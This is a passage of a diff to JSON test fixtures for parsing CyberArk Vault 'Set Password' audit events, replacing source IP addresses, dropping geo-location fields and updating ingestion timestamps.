"preserve_original_event" @@ -360,7 +336,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -368,7 +344,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:52Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Set Password", "message": "Set Password", "issuer": "PSMPGW_localhost.localdomain", @@ -382,8 +358,8 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212154600Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:52Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:52\",\"IsoTimestamp\":\"2021-03-10T09:11:52Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_localhost.localdomain\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:13.320154900Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:52Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:52\",\"IsoTimestamp\":\"2021-03-10T09:11:52Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_localhost.localdomain\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" } @@ -395,20 +371,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -425,7 +389,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -433,7 +397,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:55Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Set Password", "message": "Set Password", "issuer": "PSMP_ADB_localhost.localdomain", @@ -447,8 +411,8 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212155800Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:55Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:55\",\"IsoTimestamp\":\"2021-03-10T09:11:55Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMP_ADB_localhost.localdomain\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:13.320159200Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:55Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:55\",\"IsoTimestamp\":\"2021-03-10T09:11:55Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMP_ADB_localhost.localdomain\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" } @@ -460,20 +424,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -490,7 +442,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -498,7 +450,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T18:46:47Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Set Password", "message": "Set Password", "issuer": "PSMApp_VAGRANT", @@ -512,8 +464,8 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212157600Z", - "original": "\u003c5\u003e1 2021-03-10T18:46:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:46:47\",\"IsoTimestamp\":\"2021-03-10T18:46:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_VAGRANT\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:13.320163200Z", + "original": "\u003c5\u003e1 2021-03-10T18:46:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:46:47\",\"IsoTimestamp\":\"2021-03-10T18:46:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_VAGRANT\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" } @@ -525,20 +477,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -555,7 +495,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -563,7 +503,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T18:46:47Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Set Password", "message": "Set Password", "issuer": "PSMGw_VAGRANT", @@ -577,8 +517,8 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212158800Z", - "original": "\u003c5\u003e1 2021-03-10T18:46:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:46:47\",\"IsoTimestamp\":\"2021-03-10T18:46:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMGw_VAGRANT\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:13.320167Z", + "original": "\u003c5\u003e1 2021-03-10T18:46:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:46:47\",\"IsoTimestamp\":\"2021-03-10T18:46:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMGw_VAGRANT\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" } @@ -590,19 +530,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "35.192.121.42", - "ip": "35.192.121.42" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -619,7 +548,7 @@ }, "related": { "ip": [ - "35.192.121.42" + "67.43.156.14" ] }, "cyberarkpas": { @@ -627,7 +556,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T22:20:12Z", - "station": "35.192.121.42", + "station": "67.43.156.14", "action": "Set Password", "message": "Set Password", "issuer": "PSMApp_ASR-WIN", @@ -641,8 +570,8 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212160Z", - "original": "\u003c5\u003e1 2021-03-10T22:20:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:20:12\",\"IsoTimestamp\":\"2021-03-10T22:20:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:13.320171500Z", + "original": "\u003c5\u003e1 2021-03-10T22:20:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:20:12\",\"IsoTimestamp\":\"2021-03-10T22:20:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" } @@ -654,19 +583,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "35.192.121.42", - "ip": "35.192.121.42" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -683,7 +601,7 @@ }, "related": { "ip": [ - "35.192.121.42" + "67.43.156.14" ] }, "cyberarkpas": { @@ -691,7 +609,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T22:20:12Z", - "station": "35.192.121.42", + "station": "67.43.156.14", "action": "Set Password", "message": "Set Password", "issuer": "PSMGw_ASR-WIN", @@ -705,8 +623,8 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212161300Z", - "original": "\u003c5\u003e1 2021-03-10T22:20:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:20:12\",\"IsoTimestamp\":\"2021-03-10T22:20:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMGw_ASR-WIN\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:13.320176600Z", + "original": "\u003c5\u003e1 2021-03-10T22:20:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:20:12\",\"IsoTimestamp\":\"2021-03-10T22:20:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMGw_ASR-WIN\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" } @@ -718,20 +636,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -748,7 +654,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -756,8 +662,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-11T16:59:54Z", - "station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:54\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:54Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e88\u003c/MessageID\u003e\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eSet Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eSet Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:54\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:54Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e88\u003c/MessageID\u003e\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eSet Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eSet Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Set Password", "message": "Set Password", "issuer": "PSMPApp_VAGRANT", @@ -771,8 +677,8 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212162700Z", - "original": "\u003c5\u003e1 2021-03-11T16:59:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:54\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:54Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:54\",\"IsoTimestamp\":\"2021-03-11T16:59:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:13.320180600Z", + "original": "\u003c5\u003e1 2021-03-11T16:59:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:54\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:54Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:54\",\"IsoTimestamp\":\"2021-03-11T16:59:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" } @@ -784,20 +690,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -814,7 +708,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -822,8 +716,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-11T16:59:55Z", - "station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:55\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:55Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e88\u003c/MessageID\u003e\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPGW_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eSet Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eSet Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:55\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:55Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e88\u003c/MessageID\u003e\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPGW_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eSet Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eSet Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Set Password", "message": "Set Password", "issuer": "PSMPGW_VAGRANT", @@ -837,8 +731,8 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212163900Z", - "original": "\u003c5\u003e1 2021-03-11T16:59:55Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:55\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:55Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n 